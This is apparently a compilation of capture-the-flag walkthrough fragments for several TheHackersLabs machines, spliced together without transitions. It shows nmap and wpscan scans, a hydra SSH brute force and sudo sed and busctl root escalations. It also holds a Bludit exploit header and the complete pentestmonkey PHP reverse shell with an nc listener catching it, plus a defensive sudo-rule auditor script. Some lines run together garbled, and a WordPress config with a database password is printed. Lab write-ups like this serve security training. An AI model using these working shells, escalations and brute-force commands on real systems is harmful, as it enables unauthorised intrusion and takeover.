debian@Sedition:~$ sudo -l
Matching Defaults entries for debian on sedition:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User debian may run the following commands on sedition:
    (ALL) NOPASSWD: /usr/bin/sed
Found that sed can be used for passwordless sudo privilege escalation.
debian@Sedition:~$ sudo sed -n '1e exec sh 1>&0' /etc/hosts
# id
uid=0(root) gid=0(root) grupos=0(root)
# cd
# cat root.txt
laflagdelbunkerderootmola??????
❯ nmap -p- --min-rate 5000 10.161.168.195
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-11-11 13:14 CST
Nmap scan report for 10.161.168.195
Host is up (0.00066s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT     STATE SERVICE
22/tcp   open  ssh
8080/tcp open  http-proxy

Nmap done: 1 IP address (1 host up) scanned in 8.06 seconds
Following up on the web service.
Found that the host entry needs to be changed.
❯ curl http://10.161.168.195:8080/
<!doctype html>
<html lang=en>
<title>Redirecting...</title>
<h1>Redirecting...</h1>
<p>You should be redirected automatically to the target URL: <a href="http://watchstore.thl:8080/">http://watchstore.thl:8080/</a>. If not, click the link.
(base) yolo@yolo:~$ nmap -sV -Pn 10.161.196.38
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-11-20 19:26 CST
Nmap scan report for jaulacon2025.thl (10.161.196.38)
Host is up (0.71s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.62 ((Debian))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.61 seconds
# dirty workaround to remove this warning:
# Cookie#domain returns dot-less domain name now. Use Cookie#dot_domain if you need "." at the beginning.
# see https://github.com/nahi/httpclient/issues/252
class WebAgent
  class Cookie < HTTP::Cookie
    def domain
      self.original_domain
    end
  end
end

def get_csrf(client, login_url)
  res = client.get(login_url)
  csrf_token = /input.+?name="tokenCSRF".+?value="(.+?)"/.match(res.body).captures[0]
end

def auth_ok?(res)
  HTTP::Status.redirect?(res.code) && %r{/admin/dashboard}.match?(res.headers['Location'])
end
Options:
  -r <url>, --root-url <url>        Root URL (base path) including HTTP scheme, port and root folder
  -u <username>, --user <username>  Username of the admin
  -w <path>, --wordlist <path>      Path to the wordlist file
  --debug                           Display arguments
  -H, --help                        Show this screen
(base) yolo@yolo:~$ head -n 40 48701.py
# Title: Bludit 3.9.2 - Directory Traversal
# Author: James Green
# Date: 2020-07-20
# Vendor Homepage: https://www.bludit.com
# Software Link: https://github.com/bludit/bludit
# Version: 3.9.2
# Tested on: Linux Ubuntu 19.10 Eoan
# CVE: CVE-2019-16113
#
# Special Thanks to Ali Faraj (@InfoSecAli) and authors of MSF Module https://www.exploit-db.com/exploits/47699

#### USAGE ####
# 1. Create payloads: .png with PHP payload and the .htaccess to treat .pngs like PHP
# 2. Change hardcoded values: URL is your target webapp, username and password is admin creds to get to the admin dir
# 3. Run the exploit
# 4. Start a listener to match your payload: `nc -nlvp 53`, meterpreter multi handler, etc
# 5. Visit your target web app and open the evil picture: visit url + /bl-content/tmp/temp/evil.png

#!/usr/bin/env python3

import requests
import re
import argparse
import random
import string
import base64
from requests.exceptions import Timeout

url = 'http://jaulacon2025.thl'   # CHANGE ME
username = 'Jaulacon2025'         # CHANGE ME
password = 'cassandra'            # CHANGE ME
┌─[user@parrot]─[~]
└──╼ $nc -lvnp 4444
Listening on 0.0.0.0 4444
Connection received on 10.161.196.38 45564
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Next, stabilize the shell:
/usr/bin/script -qc /bin/bash /dev/null
^z
stty raw -echo;fg
reset
xterm
(base) yolo@yolo:~$ ssh JaulaCon2025@10.161.196.38
JaulaCon2025@10.161.196.38's password:
Linux JaulaCon2025 6.1.0-26-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.112-1 (2024-09-30) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Nov 20 15:05:45 2025 from 10.161.155.145
JaulaCon2025@JaulaCon2025:~$ id
uid=1001(JaulaCon2025) gid=1001(JaulaCon2025) grupos=1001(JaulaCon2025)
JaulaCon2025@JaulaCon2025:~$ ls
user.txt
JaulaCon2025@JaulaCon2025:~$ cat user.txt
368409a919088e8707d0617365?????? -
JaulaCon2025@JaulaCon2025:~$ sudo -l
sudo: unable to resolve host JaulaCon2025: Nombre o servicio desconocido
Matching Defaults entries for JaulaCon2025 on JaulaCon2025:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User JaulaCon2025 may run the following commands on JaulaCon2025:
    (root) NOPASSWD: /usr/bin/busctl
JaulaCon2025@JaulaCon2025:~$ sudo /usr/bin/busctl set-property org.freedesktop.systemd1 /org/freedesktop/systemd1 org.freedesktop.systemd1.Manager LogLevel s debug --address=unixexec:path=/bin/sh,argv1=-c,argv2='/bin/sh -i 0<&2 1>&2'
sudo: unable to resolve host JaulaCon2025: Nombre o servicio desconocido
# id
uid=0(root) gid=0(root) grupos=0(root)
# cd
# cat root.txt
097fac9db83a1806f3355cf952?????? -
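Every root on this page came from a `sudo -l` rule (zsh, vim, vi, sed, busctl, and an `(ALL : ALL) ALL` entry). The defender's counterpart is a sudoers audit; the Python below is an added example, not the page's code: it parses constructed `sudo -l` output in the format shown above and flags rules whose command is itself a shell or is documented to spawn one. `audit_sudo_l`, `classify` and the sample text are my own, and the sample concatenates the rules of several hosts into one text for the demonstration.

```python
import os
import re

# Commands a sudo rule should almost never grant, with the reason each one
# amounts to "run a root shell" (every entry here appears on this page).
SHELL_CAPABLE = {
    "sh": "is a shell",
    "bash": "is a shell",
    "zsh": "is a shell",
    "vi": "editor: executes shell commands (e.g. via -c ':!...')",
    "vim": "editor: executes shell commands (e.g. via -c ':!...')",
    "sed": "the 'e' command hands its input to a shell",
    "busctl": "--address=unixexec: runs an arbitrary program as the bus transport",
}

HEADER = re.compile(r"^User (\S+) may run the following commands on (\S+):")
# "    (runas) [TAG: ...] command" ; Defaults lines and prompts never match.
RULE = re.compile(r"^\s+\(([^)]*)\)\s+((?:[A-Z]+:\s*)*)(\S.*?)\s*$")


def classify(command):
    """Return why a sudo command is dangerous, or None if it is not on the list."""
    if command.strip() == "ALL":
        return "unrestricted: any command"
    binary = os.path.basename(command.split()[0])
    return SHELL_CAPABLE.get(binary)


def audit_sudo_l(text):
    """Parse `sudo -l` output (possibly several hosts concatenated) into findings."""
    findings = []
    user = host = None
    for line in text.splitlines():
        m = HEADER.match(line)
        if m:
            user, host = m.groups()
            continue
        m = RULE.match(line)
        if not m or user is None:
            continue                     # Defaults, blanks, password prompts
        runas, tags, command = m.groups()
        reason = classify(command)
        if reason is None:
            continue
        findings.append({
            "user": user, "host": host, "runas": runas,
            "nopasswd": "NOPASSWD:" in tags,
            "command": command, "reason": reason,
        })
    return findings


# Constructed sample: the rules seen on this page's machines, concatenated,
# plus one benign rule (user "ops", host "example-host") that must not be flagged.
SAMPLE = """\
User zappskred may run the following commands on TheHackersLabs-ZAPP:
    (root) /bin/zsh
User dragon may run the following commands on TheHackersLabs-Dragon:
    (ALL) NOPASSWD: /usr/bin/vim
User thl may run the following commands on nodeception:
    (ALL) NOPASSWD: /usr/bin/vi
    (ALL : ALL) ALL
User debian may run the following commands on sedition:
    (ALL) NOPASSWD: /usr/bin/sed
User JaulaCon2025 may run the following commands on JaulaCon2025:
    (root) NOPASSWD: /usr/bin/busctl
User ops may run the following commands on example-host:
    (root) NOPASSWD: /usr/bin/id
"""

if __name__ == "__main__":
    for f in audit_sudo_l(SAMPLE):
        flag = "NOPASSWD " if f["nopasswd"] else ""
        print(f"{f['host']}: {f['user']} -> ({f['runas']}) {flag}{f['command']}: {f['reason']}")
```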
(base) yolo@yolo:~$ nmap -sV -Pn 10.161.170.2
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-11-21 22:13 CST
Nmap scan report for 10.161.170.2
Host is up (0.84s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.62 ((Debian))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.37 seconds
(base) yolo@yolo:~$ dirsearch -u http://10.161.170.2/
/home/yolo/.pyenv/versions/3.13.1/lib/python3.13/site-packages/dirsearch/dirsearch.py:23: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
  from pkg_resources import DistributionNotFound, VersionConflict
(base) yolo@yolo:~$ dirsearch -u http://10.161.170.2/education/
/home/yolo/.pyenv/versions/3.13.1/lib/python3.13/site-packages/dirsearch/dirsearch.py:23: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
  from pkg_resources import DistributionNotFound, VersionConflict
(base) yolo@yolo:~$ wpscan --api-token <my_api_key> --url http://facultad.thl/education -e u,vp --plugins-detection aggressive
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.28
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

...... some output omitted ......

[+] XML-RPC seems to be enabled: http://facultad.thl/education/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://facultad.thl/education/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://facultad.thl/education/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 6.7.1 identified (Insecure, released on 2024-11-21).
 | Found By: Rss Generator (Passive Detection)
 |  - http://facultad.thl/education/?feed=rss2, <generator>https://wordpress.org/?v=6.7.1</generator>
 |  - http://facultad.thl/education/?feed=comments-rss2, <generator>https://wordpress.org/?v=6.7.1</generator>
 |
 | [!] 2 vulnerabilities identified:
 |
 | [!] Title: WP < 6.8.3 - Author+ DOM Stored XSS
 |     Fixed in: 6.7.4
 |     References:
 |      - https://wpscan.com/vulnerability/c4616b57-770f-4c40-93f8-29571c80330a
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-58674
 |      - https://patchstack.com/database/wordpress/wordpress/wordpress/vulnerability/wordpress-wordpress-wordpress-6-8-2-cross-site-scripting-xss-vulnerability
 |      - https://wordpress.org/news/2025/09/wordpress-6-8-3-release/
 |
 | [!] Title: WP < 6.8.3 - Contributor+ Sensitive Data Disclosure
 |     Fixed in: 6.7.4
 |     References:
 |      - https://wpscan.com/vulnerability/1e2dad30-dd95-4142-903b-4d5c580eaad2
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-58246
 |      - https://patchstack.com/database/wordpress/wordpress/wordpress/vulnerability/wordpress-wordpress-wordpress-6-8-2-sensitive-data-exposure-vulnerability
 |      - https://wordpress.org/news/2025/09/wordpress-6-8-3-release/

[+] WordPress theme in use: twentytwentyfive
 | Location: http://facultad.thl/education/wp-content/themes/twentytwentyfive/
 | Last Updated: 2025-08-05T00:00:00.000Z
 | Readme: http://facultad.thl/education/wp-content/themes/twentytwentyfive/readme.txt
 | [!] The version is out of date, the latest version is 1.3
 | [!] Directory listing is enabled
 | Style URL: http://facultad.thl/education/wp-content/themes/twentytwentyfive/style.css?ver=1.0
 | Style Name: Twenty Twenty-Five
 | Style URI: https://wordpress.org/themes/twentytwentyfive/
 | Description: Twenty Twenty-Five emphasizes simplicity and adaptability. It offers flexible design options, suppor...
 | Author: the WordPress team
 | Author URI: https://wordpress.org
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.0 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://facultad.thl/education/wp-content/themes/twentytwentyfive/style.css?ver=1.0, Match: 'Version: 1.0'

[+] Enumerating Vulnerable Plugins (via Aggressive Methods)
 Checking Known Locations - Time: 00:00:08 <==============================> (7343 / 7343) 100.00% Time: 00:00:08
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] akismet
 | Location: http://facultad.thl/education/wp-content/plugins/akismet/
 | Latest Version: 5.6
 | Last Updated: 2025-11-12T16:31:00.000Z
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://facultad.thl/education/wp-content/plugins/akismet/, status: 403
 |
 | [!] 1 vulnerability identified:
 |
 | [!] Title: Akismet 2.5.0-3.1.4 - Unauthenticated Stored Cross-Site Scripting (XSS)
 |     Fixed in: 3.1.5
 |     References:
 |      - https://wpscan.com/vulnerability/1a2f3094-5970-4251-9ed0-ec595a0cd26c
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-9357
 |      - http://blog.akismet.com/2015/10/13/akismet-3-1-5-wordpress/
 |      - https://blog.sucuri.net/2015/10/security-advisory-stored-xss-in-akismet-wordpress-plugin.html
 |
 | The version could not be determined.

[+] wp-file-manager
 | Location: http://facultad.thl/education/wp-content/plugins/wp-file-manager/
 | Last Updated: 2025-06-04T11:21:00.000Z
 | Readme: http://facultad.thl/education/wp-content/plugins/wp-file-manager/readme.txt
 | [!] The version is out of date, the latest version is 8.0.2
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://facultad.thl/education/wp-content/plugins/wp-file-manager/, status: 200
 |
 | [!] 1 vulnerability identified:
 |
 | [!]
Title: Multiple elFinder Plugins - Arbitrary File Deletion via Traversal | Fixed in: 8.4.3 | References: | - https://wpscan.com/vulnerability/9569aaa4-719a-4f2e-b5f4-e74fe84e7ad8 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-0818 | - https://www.wordfence.com/threat-intel/vulnerabilities/id/c2a166de-3bdf-4883-91ba-655f2757c53b | | Version: 8.0.1 (100% confidence) | Found By: Readme - Stable Tag (Aggressive Detection) | - http://facultad.thl/education/wp-content/plugins/wp-file-manager/readme.txt | Confirmed By: Readme - ChangeLog Section (Aggressive Detection) | - http://facultad.thl/education/wp-content/plugins/wp-file-manager/readme.txt [+] Enumerating Users (via Passive and Aggressive Methods) Brute Forcing Author IDs - Time: 00:00:00 <==================================> (10 / 10) 100.00% Time: 00:00:00 [i] User(s) Identified: [+] Facultad | Found By: Rss Generator (Passive Detection) | Confirmed By: Login Error Messages (Aggressive Detection) [+] facultad | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection) [+] WPScan DB API OK | Plan: free | Requests Done (during the scan): 4 | Requests Remaining: 21 [+] Finished: Sat Nov 22 00:36:54 2025 [+] Requests Done: 7426 [+] Cached Requests: 10 [+] Data Sent: 2.119 MB [+] Data Received: 23.79 MB [+] Memory used: 300.465 MB [+] Elapsed time: 00:00:18 (base) yolo@yolo:~$ wpscan --url http://facultad.thl/education -U facultad -P /snap/seclists/rockyou.txt -t 30 _______________________________________________________________ __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ ® \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team Version 3.8.28 Sponsored by Automattic - https://automattic.com/ @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart _______________________________________________________________
[+] URL: http://facultad.thl/education/ [10.161.170.2] [+] Started: Sat Nov 22 00:47:35 2025
[!] No WPScan API Token given, as a result vulnerability data has not been output. [!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Sat Nov 22 00:48:02 2025 [+] Requests Done: 592 [+] Cached Requests: 5 [+] Data Sent: 275.555 KB [+] Data Received: 454.28 KB [+] Memory used: 293.742 MB [+] Elapsed time: 00:00:27
<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
//
// This tool may be used for legal purposes only. Users take full responsibility
// for any actions performed using this tool. The author accepts no liability
// for damage caused by this tool. If these terms are not acceptable to you, then
// do not use this tool.
//
// In all other respects the GPL version 2 applies:
//
// This program is free software; you can redistribute it and/or modify
// it under the terms of the GNU General Public License version 2 as
// published by the Free Software Foundation.
//
// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License along
// with this program; if not, write to the Free Software Foundation, Inc.,
// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
//
// You are encouraged to send comments, improvements or suggestions to
// me at pentestmonkey@pentestmonkey.net
//
// Description
// -----------
// This script will make an outbound TCP connection to a hardcoded IP and port.
// The recipient will be given a shell running as the current user (apache normally).
//
// Limitations
// -----------
// proc_open and stream_set_blocking require PHP version 4.3+, or 5+
// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.
// Some compile-time options are needed for daemonisation (like pcntl, posix). These are rarely available.
//
// Usage
// -----
// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.

// The settings block below was missing from the page as posted and is restored from the
// original tool. The listener IP is the tool's placeholder (the attacker address is not shown
// on the page); the port matches the nc listener used below.
set_time_limit (0);
$VERSION = "1.0";
$ip = '127.0.0.1';  // CHANGE THIS
$port = 4444;       // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;

//
// Daemonise ourself if possible to avoid zombies later
//

// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies. Worth a try...
if (function_exists('pcntl_fork')) {
	// Fork and have the parent process exit
	$pid = pcntl_fork();

	if ($pid == -1) {
		printit("ERROR: Can't fork");
		exit(1);
	}

	if ($pid) {
		exit(0);  // Parent exits
	}

	// Make the current process a session leader
	// Will only succeed if we forked
	if (posix_setsid() == -1) {
		printit("Error: Can't setsid()");
		exit(1);
	}

	$daemon = 1;
} else {
	printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}

// Change to a safe directory
chdir("/");

// Remove any umask we inherited
umask(0);

//
// Do the reverse shell...
//

// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
	printit("$errstr ($errno)");
	exit(1);
}

// Spawn shell process
$descriptorspec = array(
   0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
   1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
   2 => array("pipe", "w")   // stderr is a pipe that the child will write to
);

// proc_open call restored from the original tool (dropped from the page as posted)
$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
	printit("ERROR: Can't spawn shell");
	exit(1);
}

// Set everything to non-blocking
// Reason: Occasionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

while (1) {
	// Check for end of TCP connection
	if (feof($sock)) {
		printit("ERROR: Shell connection terminated");
		break;
	}

	// Check for end of STDOUT
	if (feof($pipes[1])) {
		printit("ERROR: Shell process terminated");
		break;
	}

	// Wait until a command is sent down $sock, or some
	// command output is available on STDOUT or STDERR
	$read_a = array($sock, $pipes[1], $pipes[2]);
	$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

	// If we can read from the TCP socket, send
	// data to process's STDIN
	if (in_array($sock, $read_a)) {
		if ($debug) printit("SOCK READ");
		$input = fread($sock, $chunk_size);
		if ($debug) printit("SOCK: $input");
		fwrite($pipes[0], $input);
	}

	// If we can read from the process's STDOUT
	// send data down tcp connection
	if (in_array($pipes[1], $read_a)) {
		if ($debug) printit("STDOUT READ");
		$input = fread($pipes[1], $chunk_size);
		if ($debug) printit("STDOUT: $input");
		fwrite($sock, $input);
	}

	// If we can read from the process's STDERR
	// send data down tcp connection
	if (in_array($pipes[2], $read_a)) {
		if ($debug) printit("STDERR READ");
		$input = fread($pipes[2], $chunk_size);
		if ($debug) printit("STDERR: $input");
		fwrite($sock, $input);
	}
}

// Cleanup restored from the original tool
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
	global $daemon;  // the original reads $daemon without declaring it global, so it was always unset here
	if (!$daemon) {
		print "$string\n";
	}
}

?>
$ sudo -u gabri /usr/bin/php shell.php
sudo: unable to resolve host TheHackersLabs-facultad.thl: Name or service not known

--- in a new terminal ---

┌─[user@parrot]─[~]
└──╼ $nc -lvnp 4444
Listening on 0.0.0.0 4444
Connection received on 10.161.170.2 41246
/bin/sh: 0: can't access tty; job control turned off
$ sh: turning off NDELAY mode
$ id
uid=1001(gabri) gid=1001(gabri) groups=1001(gabri)
$
(base) yolo@yolo:~$ ssh vivian@10.161.170.2 The authenticity of host '10.161.170.2 (10.161.170.2)' can't be established. ED25519 key fingerprint is SHA256:09ZSLxiw1tvVbTWbg6eZzfN1d3i5dWrpGIe+aCobTK4. This host key is known by the following other names/addresses: ~/.ssh/known_hosts:31: [hashed name] ~/.ssh/known_hosts:36: [hashed name] ~/.ssh/known_hosts:37: [hashed name] ~/.ssh/known_hosts:47: [hashed name] Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '10.161.170.2' (ED25519) to the list of known hosts. vivian@10.161.170.2's password: Linux TheHackersLabs-facultad.thl 6.1.0-26-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.112-1 (2024-09-30) x86_64
The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. You have no mail. Last login: Mon Jan 27 22:29:26 2025 from 192.168.1.56 $ id uid=1002(vivian) gid=1002(vivian) grupos=1002(vivian) $ sudo -l sudo: unable to resolve host TheHackersLabs-facultad.thl: Nombre o servicio desconocido Matching Defaults entries for vivian on TheHackersLabs-facultad: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty
User vivian may run the following commands on TheHackersLabs-facultad: (ALL) NOPASSWD: /opt/vivian/script.sh $ /usr/bin/script -qc /bin/bash /dev/null vivian@TheHackersLabs-facultad:~$ ls user.txt vivian@TheHackersLabs-facultad:~$ nano /opt/vivian/script.sh vivian@TheHackersLabs-facultad:~$ sudo /opt/vivian/script.sh sudo: unable to resolve host TheHackersLabs-facultad.thl: Nombre o servicio desconocido root@TheHackersLabs-facultad:/home/vivian# id uid=0(root) gid=0(root) grupos=0(root)
(base) yolo@yolo:~$ nmap -sV -Pn 10.161.177.114 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-11-22 16:52 CST Nmap scan report for 10.161.177.114 Host is up (0.89s latency). Not shown: 997 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0) 80/tcp open http Apache httpd 2.4.62 ((Debian)) 3306/tcp open mysql MySQL 5.5.5-10.11.6-MariaDB-0+deb12u1 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 7.34 seconds
(base) yolo@yolo:~$ hydra -l premo -P /snap/seclists/rockyou.txt ssh://10.161.177.114 -t 64 Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-11-22 21:01:06 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 64 tasks per 1 server, overall 64 tasks, 14344398 login tries (l:1/p:14344398), ~224132 tries per task [DATA] attacking ssh://10.161.177.114:22/ [STATUS] 259.00 tries/min, 259 tries in 00:01h, 14344164 to do in 923:03h, 39 active [STATUS] 229.00 tries/min, 687 tries in 00:03h, 14343743 to do in 1043:57h, 32 active [22][ssh] host: 10.161.177.114 login: premo password: cassandra 1 of 1 target successfully completed, 1 valid password found [WARNING] Writing restore file because 29 final worker threads did not complete until end. [ERROR] 29 targets did not resolve or could not be connected [ERROR] 0 target did not complete Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-11-22 21:05:43 (base) yolo@yolo:~$ ssh premo@10.161.177.114 The authenticity of host '10.161.177.114 (10.161.177.114)' can't be established. ED25519 key fingerprint is SHA256:09ZSLxiw1tvVbTWbg6eZzfN1d3i5dWrpGIe+aCobTK4. This host key is known by the following other names/addresses: ~/.ssh/known_hosts:31: [hashed name] ~/.ssh/known_hosts:36: [hashed name] ~/.ssh/known_hosts:37: [hashed name] ~/.ssh/known_hosts:47: [hashed name] ~/.ssh/known_hosts:48: [hashed name] Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '10.161.177.114' (ED25519) to the list of known hosts. premo@10.161.177.114's password: Linux Torrija-TheHackersLabs 6.1.0-26-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.112-1 (2024-09-30) x86_64
The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Thu Feb 13 20:08:49 2025 from 192.168.18.204 premo@Torrija-TheHackersLabs:~$
premo@Torrija-TheHackersLabs:~$ cat /var/www/html/wordpress/wp-config.php
<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the installation.
 * You don't have to use the website, you can copy this file to "wp-config.php"
 * and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * Database settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://developer.wordpress.org/advanced-administration/wordpress/wp-config/
 *
 * @package WordPress
 */

// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress' );

/** Database username */
define( 'DB_USER', 'admin' );

/** Database password */
define( 'DB_PASSWORD', 'afdvasgvfdsabdgvs6a9vd8sv' );

/** Database hostname */
define( 'DB_HOST', 'localhost' );

/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );

/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

/**#@+
 * Authentication unique keys and salts.
 *
 * Change these to different unique phrases! You can generate these using
 * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
 *
 * You can change these at any point in time to invalidate all existing cookies.
 * This will force all users to have to login again.
 *
 * @since 2.6.0
 */
define( 'AUTH_KEY',         'put your unique phrase here' );
define( 'SECURE_AUTH_KEY',  'put your unique phrase here' );
define( 'LOGGED_IN_KEY',    'put your unique phrase here' );
define( 'NONCE_KEY',        'put your unique phrase here' );
define( 'AUTH_SALT',        'put your unique phrase here' );
define( 'SECURE_AUTH_SALT', 'put your unique phrase here' );
define( 'LOGGED_IN_SALT',   'put your unique phrase here' );
define( 'NONCE_SALT',       'put your unique phrase here' );

/**#@-*/

/**
 * WordPress database table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 *
 * At the installation time, database tables are created with the specified prefix.
 * Changing this value after WordPress is installed will make your site think
 * it has not been installed.
 *
 * @link https://developer.wordpress.org/advanced-administration/wordpress/wp-config/#table-prefix
 */
$table_prefix = 'wp_';

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 *
 * For information on other constants that can be used for debugging,
 * visit the documentation.
 *
 * @link https://developer.wordpress.org/advanced-administration/debug/debug-wordpress/
 */
define( 'WP_DEBUG', false );

/* Add any custom values between this line and the "stop editing" line. */

/* That's all, stop editing! Happy publishing. */

/** Absolute path to the WordPress directory. */
